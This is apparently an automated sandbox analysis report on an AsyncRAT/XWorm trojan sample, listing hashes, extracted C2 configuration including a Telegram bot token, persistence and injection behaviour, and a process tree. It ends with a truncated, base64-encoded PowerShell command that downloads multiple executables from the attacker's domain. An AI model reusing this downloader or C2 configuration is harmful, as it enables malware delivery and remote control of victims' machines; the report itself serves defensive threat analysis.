asyncrat | c7bd91207ac565f362c9a9702bcf5cb278b414e8a5489087431a448011d32f47

Analysis

max time kernel
1828s
max time network
1844s
platform
windows10-1703_x64
resource
win10-20231215-en
resource tags

arch:x64arch:x86image:win10-20231215-enlocale:en-usos:windows10-1703-x64system
submitted
30/12/2023, 09:29

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

fvia.exe
Size

75.8MB
MD5

864fec7c56d3a3fd0de982a049dc247a
SHA1

ef6240916847124235a523bf867c91a944e1c65b
SHA256

c7bd91207ac565f362c9a9702bcf5cb278b414e8a5489087431a448011d32f47
SHA512

452acfeda622d2948cdab3820fe2e688f91b7a11da5d97e34f04e5c350d60aff069d5620a9961cd92876291a65511a83a6ab05619d5c3e8aa0280d3cd374335b
SSDEEP

1572864:tERVE3V33f9SIdRMYxBvc+bOv6UEiQ/0SWyI+jHC7BX:tEgllfxBvTUOjddON

Score

10^/10

asyncrat xworm default persistence rat trojan

Malware Config

Extracted

Family

xworm

Version

3.1

Attributes

Install_directory
%ProgramData%
install_file
SecurityHealthSystray.exe
telegram
https://api.telegram.org/bot5370417334:AAEZrEauqhTNZInhZ9_-SaapQJIi0hIvjJU

Extracted

Family

asyncrat

Botnet

Default

Mutex

尺vcΕ贼2C伊R开tΗKTتDmF尺

Attributes

c2_url_file
https://fvia.app/ip2.txt
delay
5
install
false
install_folder
%Windows%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat

Detect Xworm Payload 6 IoCs

resource	yara_rule
behavioral2/files/0x000600000001ac2e-148.dat	family_xworm
behavioral2/files/0x000600000001ac2e-143.dat	family_xworm
behavioral2/memory/4616-168-0x0000000000FD0000-0x0000000001034000-memory.dmp	family_xworm
behavioral2/files/0x000700000001ac39-232.dat	family_xworm
behavioral2/files/0x000700000001ac39-234.dat	family_xworm
behavioral2/files/0x000700000001ac39-206.dat	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Async RAT payload 13 IoCs

rat

resource	yara_rule
behavioral2/files/0x000600000001ac32-186.dat	asyncrat
behavioral2/files/0x000600000001ac32-185.dat	asyncrat
behavioral2/memory/2216-208-0x00000000001A0000-0x00000000003EA000-memory.dmp	asyncrat
behavioral2/memory/764-309-0x0000000000400000-0x0000000000422000-memory.dmp	asyncrat
behavioral2/memory/4140-451-0x0000000000400000-0x0000000000692000-memory.dmp	asyncrat
behavioral2/memory/4140-463-0x0000000000400000-0x0000000000692000-memory.dmp	asyncrat
behavioral2/memory/4140-468-0x0000000000400000-0x0000000000692000-memory.dmp	asyncrat
behavioral2/memory/4140-466-0x0000000000400000-0x0000000000692000-memory.dmp	asyncrat
behavioral2/memory/4140-471-0x0000000000400000-0x0000000000692000-memory.dmp	asyncrat
behavioral2/memory/4140-469-0x0000000000400000-0x0000000000692000-memory.dmp	asyncrat
behavioral2/memory/4140-473-0x0000000000400000-0x0000000000692000-memory.dmp	asyncrat
behavioral2/memory/4140-477-0x0000000000400000-0x0000000000692000-memory.dmp	asyncrat
behavioral2/memory/4140-475-0x0000000000400000-0x0000000000692000-memory.dmp	asyncrat

Blocklisted process makes network request 4 IoCs

flow	pid	Process
11	4316	WScript.exe
15	4316	WScript.exe
23	4316	WScript.exe
28	4652	powershell.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsSecurity.lnk	WindowsSecurity.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsSecurity.lnk	WindowsSecurity.exe

Executes dropped EXE 64 IoCs

pid	Process
4772	update.exe
4124	svchost.exe
4160	SystemSettings.exe
1768	svchost.exe
4228	SystemSettings.exe
2600	svchost.exe
4916	taskhostw.exe
5104	svchost.exe
3680	VM.exe
1104	taskhostw.exe
4324	1.exe
4336	SecurityHealthSystray.exe
2800	svchost.exe
2748	2.exe
1604	3.exe
4396	4.exe
3352	5.exe
3220	Simple.exe
2952	SecurityHealthSystray.exe
4616	WindowsSecurity.exe
4328	svchost.exe
768	Seting.exe
2216	splwow64.exe
3124	dow.exe
4340	WindowsSecurity.exe
1112	Simple.exe
508	ntoskrn.exe
2280	SecurityHealthSystray.exe
1912	tab.exe
2812	RuntimeBroker.exe
4192	Security.exe
3624	Registry Editor.exe
4572	svchost.exe
4244	svchost.exe
4424	ship.exe
1012	svchost.exe
2704	svchost.exe
4428	ko.exe
4268	svchost.exe
4468	svchost.exe
3124	dow.exe
2988	WindowsSecurity.exe
928	Seting.exe
1788	SecurityHealthSystray.exe
4404	svchost.exe
3104	Simple.exe
5536	WindowsSecurity.exe
5828	WindowsSecurity.exe
5936	WindowsSecurity.exe
244	WindowsSecurity.exe
5600	WindowsSecurity.exe
5300	WindowsSecurity.exe
5276	WindowsSecurity.exe
5248	WindowsSecurity.exe
5772	WindowsSecurity.exe
4628	WindowsSecurity.exe
6104	WindowsSecurity.exe
436	WindowsSecurity.exe
3944	WindowsSecurity.exe
4160	WindowsSecurity.exe
5300	WindowsSecurity.exe
5276	WindowsSecurity.exe
5244	WindowsSecurity.exe
5796	WindowsSecurity.exe

Loads dropped DLL 1 IoCs

pid	Process
4228	SystemSettings.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1968775928-2924269989-3510977013-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsSecurity = "C:\\ProgramData\\WindowsSecurity.exe"	WindowsSecurity.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
17	ip-api.com

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 3624 set thread context of 764	3624	Registry Editor.exe	105
PID 928 set thread context of 4140	928	Seting.exe	137

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Java\jre-1.8\bin\orbd.exe	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Analysis Services\AS OLEDB\140\SQLDumper.exe	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-1000-0000000FF1CE}\xlicons.exe	svchost.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Wallet_1.0.16328.0_x64__8wekyb3d8bbwe\Microsoft.Wallet.exe	svchost.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\wsimport.exe	svchost.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\ktab.exe	svchost.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\jp2launcher.exe	svchost.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\pack200.exe	svchost.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\java.exe	svchost.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\javaws.exe	svchost.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\klist.exe	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	svchost.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exe	svchost.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\106.0.5249.119\chrome_pwa_launcher.exe	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\MSOHTMED.EXE	svchost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\MSOXMLED.EXE	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\AppSharingHookController.exe	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-1000-0000000FF1CE}\ohub32.exe	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office 15\ClientX64\OfficeClickToRun.exe	svchost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	svchost.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\unpack200.exe	svchost.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\jabswitch.exe	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\CLVIEW.EXE	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-1000-0000000FF1CE}\accicons.exe	svchost.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe	svchost.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\onenoteshare.exe	svchost.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.XboxGameOverlay_1.15.2003.0_x64__8wekyb3d8bbwe\GameBar.exe	svchost.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\106.0.5249.119\notification_helper.exe	svchost.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\tnameserv.exe	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\officeappguardwin32.exe	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.exe	svchost.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.People_10.1.10531.0_x64__8wekyb3d8bbwe\PeopleApp.exe	svchost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe	svchost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrServicesUpdater.exe	svchost.exe
File opened for modification	C:\Program Files\7-Zip\7zG.exe	svchost.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\chrmstp.exe	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.Loader.exe	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-1000-0000000FF1CE}\dbcicons.exe	svchost.exe
File opened for modification	C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	svchost.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsStore_11701.1001.87.0_x64__8wekyb3d8bbwe\WinStore.App.exe	svchost.exe
File opened for modification	C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	svchost.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\jp2launcher.exe	svchost.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\policytool.exe	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\PerfBoost.exe	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE	svchost.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_17.8010.5926.0_x64__8wekyb3d8bbwe\Office16\OfficeHubWin32.exe	svchost.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.XboxIdentityProvider_11.19.19003.0_x64__8wekyb3d8bbwe\XboxIdp.exe	svchost.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\javaw.exe	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\msoia.exe	svchost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\MSOSREC.EXE	svchost.exe
File opened for modification	C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdateComRegisterShell64.exe	svchost.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe	svchost.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\jdeps.exe	svchost.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.16112.11621.0_x64__8wekyb3d8bbwe\Music.UI.exe	svchost.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.16112.11601.0_x64__8wekyb3d8bbwe\Video.UI.exe	svchost.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\javapackager.exe	svchost.exe
File opened for modification	C:\Program Files\Mozilla Firefox\default-browser-agent.exe	svchost.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\pack200.exe	svchost.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\javaw.exe	svchost.exe
File opened for modification	C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdateBroker.exe	svchost.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\InspectorOfficeGadget.exe	svchost.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\jsadebugd.exe	svchost.exe

Drops file in Windows directory 11 IoCs

description	ioc	Process
File created	C:\Windows\svchost.exe	SecurityHealthSystray.exe
File created	C:\Windows\svchost.exe	dow.exe
File created	C:\Windows\svchost.exe	ntoskrn.exe
File created	C:\Windows\svchost.exe	SecurityHealthSystray.exe
File created	C:\Windows\svchost.exe	RuntimeBroker.exe
File created	C:\Windows\svchost.exe	ship.exe
File created	C:\Windows\svchost.exe	SystemSettings.exe
File created	C:\Windows\svchost.exe	taskhostw.exe
File created	C:\Windows\svchost.exe	SecurityHealthSystray.exe
File created	C:\Windows\svchost.exe	SecurityHealthSystray.exe
File created	C:\Windows\svchost.exe	Security.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
5396	schtasks.exe
5820	schtasks.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1968775928-2924269989-3510977013-1000_Classes\Local Settings	Seting.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4652	powershell.exe
3956	powershell.exe
4128	powershell.exe
4128	powershell.exe
4128	powershell.exe
708	powershell.exe
708	powershell.exe
4128	powershell.exe
4080	dw20.exe
4080	dw20.exe
3956	powershell.exe
3956	powershell.exe
708	powershell.exe
4652	powershell.exe
4652	powershell.exe
3956	powershell.exe
4748	powershell.exe
4748	powershell.exe
4748	powershell.exe
4652	powershell.exe
4652	powershell.exe
708	powershell.exe
708	powershell.exe
4748	powershell.exe
4740	powershell.exe
4740	powershell.exe
4740	powershell.exe
4740	powershell.exe
2216	splwow64.exe
2216	splwow64.exe
2216	splwow64.exe
2216	splwow64.exe
2216	splwow64.exe
2216	splwow64.exe
2216	splwow64.exe
2216	splwow64.exe
2216	splwow64.exe
2216	splwow64.exe
764	RegAsm.exe
764	RegAsm.exe
2216	splwow64.exe
2216	splwow64.exe
764	RegAsm.exe
764	RegAsm.exe
764	RegAsm.exe
764	RegAsm.exe
2216	splwow64.exe
2216	splwow64.exe
2216	splwow64.exe
2216	splwow64.exe
764	RegAsm.exe
764	RegAsm.exe
2216	splwow64.exe
2216	splwow64.exe
764	RegAsm.exe
764	RegAsm.exe
2216	splwow64.exe
2216	splwow64.exe
764	RegAsm.exe
764	RegAsm.exe
764	RegAsm.exe
764	RegAsm.exe
2216	splwow64.exe
2216	splwow64.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4228	SystemSettings.exe
Token: SeDebugPrivilege	4652	powershell.exe
Token: SeDebugPrivilege	3956	powershell.exe
Token: SeRestorePrivilege	4080	dw20.exe
Token: SeBackupPrivilege	4080	dw20.exe
Token: SeDebugPrivilege	4128	powershell.exe
Token: SeDebugPrivilege	708	powershell.exe
Token: SeDebugPrivilege	4616	WindowsSecurity.exe
Token: SeDebugPrivilege	4340	WindowsSecurity.exe
Token: SeIncreaseQuotaPrivilege	4128	powershell.exe
Token: SeSecurityPrivilege	4128	powershell.exe
Token: SeTakeOwnershipPrivilege	4128	powershell.exe
Token: SeLoadDriverPrivilege	4128	powershell.exe
Token: SeSystemProfilePrivilege	4128	powershell.exe
Token: SeSystemtimePrivilege	4128	powershell.exe
Token: SeProfSingleProcessPrivilege	4128	powershell.exe
Token: SeIncBasePriorityPrivilege	4128	powershell.exe
Token: SeCreatePagefilePrivilege	4128	powershell.exe
Token: SeBackupPrivilege	4128	powershell.exe
Token: SeRestorePrivilege	4128	powershell.exe
Token: SeShutdownPrivilege	4128	powershell.exe
Token: SeDebugPrivilege	4128	powershell.exe
Token: SeSystemEnvironmentPrivilege	4128	powershell.exe
Token: SeRemoteShutdownPrivilege	4128	powershell.exe
Token: SeUndockPrivilege	4128	powershell.exe
Token: SeManageVolumePrivilege	4128	powershell.exe
Token: 33	4128	powershell.exe
Token: 34	4128	powershell.exe
Token: 35	4128	powershell.exe
Token: 36	4128	powershell.exe
Token: SeDebugPrivilege	2988	WindowsSecurity.exe
Token: SeDebugPrivilege	4748	powershell.exe
Token: SeDebugPrivilege	4740	powershell.exe
Token: SeIncreaseQuotaPrivilege	4748	powershell.exe
Token: SeSecurityPrivilege	4748	powershell.exe
Token: SeTakeOwnershipPrivilege	4748	powershell.exe
Token: SeLoadDriverPrivilege	4748	powershell.exe
Token: SeSystemProfilePrivilege	4748	powershell.exe
Token: SeSystemtimePrivilege	4748	powershell.exe
Token: SeProfSingleProcessPrivilege	4748	powershell.exe
Token: SeIncBasePriorityPrivilege	4748	powershell.exe
Token: SeCreatePagefilePrivilege	4748	powershell.exe
Token: SeBackupPrivilege	4748	powershell.exe
Token: SeRestorePrivilege	4748	powershell.exe
Token: SeShutdownPrivilege	4748	powershell.exe
Token: SeDebugPrivilege	4748	powershell.exe
Token: SeSystemEnvironmentPrivilege	4748	powershell.exe
Token: SeRemoteShutdownPrivilege	4748	powershell.exe
Token: SeUndockPrivilege	4748	powershell.exe
Token: SeManageVolumePrivilege	4748	powershell.exe
Token: 33	4748	powershell.exe
Token: 34	4748	powershell.exe
Token: 35	4748	powershell.exe
Token: 36	4748	powershell.exe
Token: SeDebugPrivilege	2216	splwow64.exe
Token: SeDebugPrivilege	2216	splwow64.exe
Token: SeDebugPrivilege	764	RegAsm.exe
Token: SeDebugPrivilege	764	RegAsm.exe
Token: SeDebugPrivilege	4140	RegAsm.exe
Token: SeDebugPrivilege	4688	powershell.exe
Token: SeIncreaseQuotaPrivilege	4688	powershell.exe
Token: SeSecurityPrivilege	4688	powershell.exe
Token: SeTakeOwnershipPrivilege	4688	powershell.exe
Token: SeLoadDriverPrivilege	4688	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4616	WindowsSecurity.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2200 wrote to memory of 4772	2200	fvia.exe	71
PID 2200 wrote to memory of 4772	2200	fvia.exe	71
PID 2200 wrote to memory of 4124	2200	fvia.exe	72
PID 2200 wrote to memory of 4124	2200	fvia.exe	72
PID 2200 wrote to memory of 4124	2200	fvia.exe	72
PID 4124 wrote to memory of 4652	4124	svchost.exe	73
PID 4124 wrote to memory of 4652	4124	svchost.exe	73
PID 4124 wrote to memory of 4652	4124	svchost.exe	73
PID 2200 wrote to memory of 4160	2200	fvia.exe	75
PID 2200 wrote to memory of 4160	2200	fvia.exe	75
PID 2200 wrote to memory of 4160	2200	fvia.exe	75
PID 4160 wrote to memory of 1768	4160	SystemSettings.exe	76
PID 4160 wrote to memory of 1768	4160	SystemSettings.exe	76
PID 4160 wrote to memory of 1768	4160	SystemSettings.exe	76
PID 1768 wrote to memory of 4228	1768	svchost.exe	79
PID 1768 wrote to memory of 4228	1768	svchost.exe	79
PID 2200 wrote to memory of 4916	2200	fvia.exe	78
PID 2200 wrote to memory of 4916	2200	fvia.exe	78
PID 2200 wrote to memory of 4916	2200	fvia.exe	78
PID 4916 wrote to memory of 5104	4916	taskhostw.exe	80
PID 4916 wrote to memory of 5104	4916	taskhostw.exe	80
PID 4916 wrote to memory of 5104	4916	taskhostw.exe	80
PID 2200 wrote to memory of 3680	2200	fvia.exe	81
PID 2200 wrote to memory of 3680	2200	fvia.exe	81
PID 2200 wrote to memory of 3680	2200	fvia.exe	81
PID 5104 wrote to memory of 1104	5104	svchost.exe	82
PID 5104 wrote to memory of 1104	5104	svchost.exe	82
PID 5104 wrote to memory of 1104	5104	svchost.exe	82
PID 1104 wrote to memory of 3956	1104	taskhostw.exe	84
PID 1104 wrote to memory of 3956	1104	taskhostw.exe	84
PID 1104 wrote to memory of 3956	1104	taskhostw.exe	84
PID 1104 wrote to memory of 4324	1104	taskhostw.exe	85
PID 1104 wrote to memory of 4324	1104	taskhostw.exe	85
PID 2200 wrote to memory of 4336	2200	fvia.exe	86
PID 2200 wrote to memory of 4336	2200	fvia.exe	86
PID 2200 wrote to memory of 4336	2200	fvia.exe	86
PID 4336 wrote to memory of 2800	4336	SecurityHealthSystray.exe	92
PID 4336 wrote to memory of 2800	4336	SecurityHealthSystray.exe	92
PID 4336 wrote to memory of 2800	4336	SecurityHealthSystray.exe	92
PID 3680 wrote to memory of 4080	3680	VM.exe	87
PID 3680 wrote to memory of 4080	3680	VM.exe	87
PID 3680 wrote to memory of 4080	3680	VM.exe	87
PID 1104 wrote to memory of 2748	1104	taskhostw.exe	91
PID 1104 wrote to memory of 2748	1104	taskhostw.exe	91
PID 1104 wrote to memory of 1604	1104	taskhostw.exe	90
PID 1104 wrote to memory of 1604	1104	taskhostw.exe	90
PID 1104 wrote to memory of 4396	1104	taskhostw.exe	88
PID 1104 wrote to memory of 4396	1104	taskhostw.exe	88
PID 1104 wrote to memory of 3352	1104	taskhostw.exe	89
PID 1104 wrote to memory of 3352	1104	taskhostw.exe	89
PID 4324 wrote to memory of 3220	4324	1.exe	93
PID 4324 wrote to memory of 3220	4324	1.exe	93
PID 4396 wrote to memory of 2952	4396	4.exe	97
PID 4396 wrote to memory of 2952	4396	4.exe	97
PID 4396 wrote to memory of 2952	4396	4.exe	97
PID 1604 wrote to memory of 4616	1604	3.exe	98
PID 1604 wrote to memory of 4616	1604	3.exe	98
PID 2952 wrote to memory of 4328	2952	SecurityHealthSystray.exe	96
PID 2952 wrote to memory of 4328	2952	SecurityHealthSystray.exe	96
PID 2952 wrote to memory of 4328	2952	SecurityHealthSystray.exe	96
PID 4228 wrote to memory of 4128	4228	SystemSettings.exe	94
PID 4228 wrote to memory of 4128	4228	SystemSettings.exe	94
PID 3352 wrote to memory of 768	3352	5.exe	99
PID 3352 wrote to memory of 768	3352	5.exe	99

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\fvia.exe
"C:\Users\Admin\AppData\Local\Temp\fvia.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2200
- C:\Users\Admin\AppData\Local\Temp\update.exe
  "C:\Users\Admin\AppData\Local\Temp\update.exe"
  2⤵
  - Executes dropped EXE
  PID:4772
- C:\Users\Admin\AppData\Roaming\svchost.exe
  "C:\Users\Admin\AppData\Roaming\svchost.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4124
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGYAdgBpAGEALgBhAHAAcAAvAHQAYQBzAGsAaABvAHMAdAB3AC4AYgBhAHQAJwAsACAAPAAjAG4AdgByACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAdgB1AHMAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAZABxAGoAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAdABhAHMAawBoAG8AcwB0AHcALgBiAGEAdAAnACkAKQA8ACMAeQB5AGQAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AZgB2AGkAYQAuAGEAcABwAC8AbgB0AG8AcwBrAHIAbgBsAC4AZQB4AGUAJwAsACAAPAAjAG4AdwBxACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAeABrAG0AIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAeAB3AGsAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgB0AG8AcwBrAHIAbgBsAC4AZQB4AGUAJwApACkAPAAjAHMAcQBrACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGYAdgBpAGEALgBhAHAAcAAvAGEAcABwAC4AZQB4AGUAJwAsACAAPAAjAHkAcQBxACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAZABkAHgAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAcwBrAHcAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAYQBwAHAALgBlAHgAZQAnACkAKQA8ACMAZAB1AG4AIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AZgB2AGkAYQAuAGEAcABwAC8AUwB5AHMAdABlAG0ALgBlAHgAZQAnACwAIAA8ACMAegBnAGkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBzAGIAaQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBuAGYAdAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBTAHkAcwB0AGUAbQAuAGUAeABlACcAKQApADwAIwB6AG0AbgAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBmAHYAaQBhAC4AYQBwAHAALwB0AG8AbwBsAC4AZQB4AGUAJwAsACAAPAAjAG4AbgB3ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAdwB3AGIAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcAB6AGsAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAdABvAG8AbAAuAGUAeABlACcAKQApADwAIwBhAGkAcwAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBmAHYAaQBhAC4AYQBwAHAALwBTAGkAbQBwAGwAZQAuAGUAeABlACcALAAgADwAIwBkAGUAZwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGEAeABrACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHQAYgBlACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAaQBtAHAAbABlAC4AZQB4AGUAJwApACkAPAAjAGMAcQBiACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGYAdgBpAGEALgBhAHAAcAAvAHYAcABzAC4AZQB4AGUAJwAsACAAPAAjAGkAeQBkACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAdwB3AHEAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdwBzAGgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAdgBwAHMALgBlAHgAZQAnACkAKQA8ACMAZgBhAGEAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbw